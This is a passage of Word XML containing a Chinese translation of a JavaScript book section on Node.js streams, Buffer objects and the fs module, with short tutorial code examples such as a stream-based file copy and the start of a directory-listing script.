    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.on("SIGINT",function(){console.log("Ignored Ctrl-C");});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的设计目标是高性能</w:t>
      </w:r>
      <w:r>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:t>，因此其流</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>常被用到。当数据准备好时，可读流会触发事件。在下面的代码中，假设</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>是在其他地方得到的可读流。下面我们将看到如何从文件和网络套接字中得到流对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>输入流</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.on("data",f);//</w:t>
      </w:r>
      <w:r>
        <w:t>当数据可用时，把它作为参数传给</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.on("end",f);//</w:t>
      </w:r>
      <w:r>
        <w:t>当不再有数据达到，在文件结束（</w:t>
      </w:r>
      <w:r>
        <w:t>EOF</w:t>
      </w:r>
      <w:r>
        <w:t>）时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"end"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.on("error",f);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果发生错误，把异常传递给</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.readable//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它是依旧打开的可读流，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.pause();//</w:t>
      </w:r>
      <w:r>
        <w:t>暂停</w:t>
      </w:r>
      <w:r>
        <w:t>"data"</w:t>
      </w:r>
      <w:r>
        <w:t>事件。例如，为了限制上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.resume();//</w:t>
      </w:r>
      <w:r>
        <w:t>再次恢复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果想把字符串传给</w:t>
      </w:r>
      <w:r>
        <w:t>"data"</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，请指定编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.setEncoding(enc);//</w:t>
      </w:r>
      <w:r>
        <w:t>如何对字节编码：</w:t>
      </w:r>
      <w:r>
        <w:t>"utf8"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"ascii"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"base64"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可写流比可读流的核心事件少。使用</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送数据，当所有数据写入完毕后使用</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法结束流。</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法决不会阻塞。若</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>无法立即写入数据而不得不在内部缓存它，则</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果你想知道</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>何</w:t>
      </w:r>
      <w:r>
        <w:t>时刷新缓冲区并确保数据实际上已写入，那么请注册</w:t>
      </w:r>
      <w:r>
        <w:t>"drain"</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>输出流</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.write(buffer);//</w:t>
      </w:r>
      <w:r>
        <w:t>写入二进制数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.write(string,encoding)//</w:t>
      </w:r>
      <w:r>
        <w:t>写入字符串数据，默认编码是</w:t>
      </w:r>
      <w:r>
        <w:t>"utf-8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.end()//</w:t>
      </w:r>
      <w:r>
        <w:t>结束流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>s.end(buffer);//</w:t>
      </w:r>
      <w:r>
        <w:t>写入最后的二进制数据块并结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.end(str,encoding)//</w:t>
      </w:r>
      <w:r>
        <w:t>写入最后的字符串并结束所有流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.writeable;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果流依旧打开且可写入，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.on("drain",f)//</w:t>
      </w:r>
      <w:r>
        <w:t>当内部缓冲区</w:t>
      </w:r>
      <w:r>
        <w:t>为空，调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如之前代码所示，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的流能处理二进制数据和文本数据。文本传输使用的是普通</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，字节使用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>特定的缓冲区来处理。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的缓冲区是有固定长度的类数组对象，其元素数量必须在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>程序通常把缓冲区作为不透明的数据块来对待，将它们从一个流中读取然后写入另一个。但缓冲区中的字节能够像数组元素一样存取，其对应的方法有从一个缓冲区复制二进制数据到另一个、获取基础缓冲区的切片（</w:t>
      </w:r>
      <w:r>
        <w:t>slice</w:t>
      </w:r>
      <w:r>
        <w:t>）、使用指定编码把字符串写入缓冲区和把缓冲区或部分缓冲区解码回字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bytes=new Buffer(256);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>256</w:t>
      </w:r>
      <w:r>
        <w:t>字节的新缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>bytes.length;i++)//</w:t>
      </w:r>
      <w:r>
        <w:t>通过索引值进行遍历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes[i]=i;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置缓冲区的每个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var end=bytes.slice(240,256);//</w:t>
      </w:r>
      <w:r>
        <w:t>为这个缓冲区创建一个新的视图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>end[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>240</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>end[0]</w:t>
      </w:r>
      <w:r>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:t>bytes[240]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>end[0]=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>修改这个切片的一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes[240]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>：原始缓冲区也修改了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var more=new </w:t>
      </w:r>
      <w:r>
        <w:t>Buffer(8);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的独立缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>end.copy(more,0,8,16);//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>end[]</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>元素复制到</w:t>
      </w:r>
      <w:r>
        <w:t>more[]</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>more[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>248</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>缓冲区也可以实现二进制＜</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>＞文本的转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>合法编码是</w:t>
      </w:r>
      <w:r>
        <w:t>"utf8"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"ascii"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"base64"</w:t>
      </w:r>
      <w:r>
        <w:t>，默认编码是</w:t>
      </w:r>
      <w:r>
        <w:t>"utf8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var buf=new Buffer("2πr","utf8");//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>把文本编码为字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>buf.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个字符占</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>buf.toString()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"2πr"</w:t>
      </w:r>
      <w:r>
        <w:t>：返回文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>buf=new Buffer(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个新的固定长度的缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var len=buf.write("πr2",4);//</w:t>
      </w:r>
      <w:r>
        <w:t>从第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节开始写入文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>buf.toString("utf8",4,4+len)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"πr2":</w:t>
      </w:r>
      <w:r>
        <w:t>解码一段字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的文件和文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>位于</w:t>
      </w:r>
      <w:r>
        <w:t>"fs"</w:t>
      </w:r>
      <w:r>
        <w:t>模块中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fs=require("fs");//</w:t>
      </w:r>
      <w:r>
        <w:t>加载文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个模块提供了其绝大部分方法的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>同步版本</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。任何名字以</w:t>
      </w:r>
      <w:r>
        <w:t>"Sync"</w:t>
      </w:r>
      <w:r>
        <w:t>结尾的方法都是一个阻塞方法，它返回一个值或抛出一个异常。不以</w:t>
      </w:r>
      <w:r>
        <w:t>"Sync"</w:t>
      </w:r>
      <w:r>
        <w:t>结</w:t>
      </w:r>
      <w:r>
        <w:t>尾的文件系统方法都是非阻塞的方法，它们会把结果或错误传给指定的回调函数。下面的代码展示了如何使用阻塞方法读取文本文件、如何使用非阻塞方法读取二进制文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同步读取文件，通过传递编码获得文本而非字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=fs.readFileSync("config.json","utf8");//</w:t>
      </w:r>
      <w:r>
        <w:t>异步读取二进制文件，通过传递函数获得数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fs.readFile("image.png",function(err,buffer){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(err)throw err;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果出现任何错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process(bu</w:t>
      </w:r>
      <w:r>
        <w:t>ffer);//</w:t>
      </w:r>
      <w:r>
        <w:t>文件内容在缓冲区中</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类似地，存在用来写文件的</w:t>
      </w:r>
      <w:r>
        <w:t>writeFile()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>writeFileSync()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>fs.writeFile("config.json",JSON.stringify(userprefs));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面展示的函数将文件内容看待为单个字符串或缓冲区。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了读写文件的流</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，下面这个函数实现了文件复制：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用流</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>复制文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>若想知道何时完成，请传递回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>fileCopy(filename1,filename2,done){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var input=fs.createReadStream(filename1);//</w:t>
      </w:r>
      <w:r>
        <w:t>输入流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var output=fs.createWriteStream(filename2);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.on("data",function(d){output.write(d);});//</w:t>
      </w:r>
      <w:r>
        <w:t>把输入复制到输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.on("error",function(err){throw err;});//</w:t>
      </w:r>
      <w:r>
        <w:t>提示错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.on("end",</w:t>
      </w:r>
      <w:r>
        <w:t>function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当输入结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>output.end();//</w:t>
      </w:r>
      <w:r>
        <w:t>关闭输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(done)done();//</w:t>
      </w:r>
      <w:r>
        <w:t>并通知回调函数</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"fs"</w:t>
      </w:r>
      <w:r>
        <w:t>模块还包括大量的方法，用于列出文件目录、查询文件属性等。下面的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>程序使用同步的方法列出一个目录的内容，并显示文件大小和修改日期：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/local/bin/node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fs=require("fs"),path=require("path");//</w:t>
      </w:r>
      <w:r>
        <w:t>加载需要的模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dir=process.cwd();//</w:t>
      </w:r>
      <w:r>
        <w:t>当前目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(proces</w:t>
      </w:r>
      <w:r>
        <w:t>s.argv.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2)dir=process.argv[2];//</w:t>
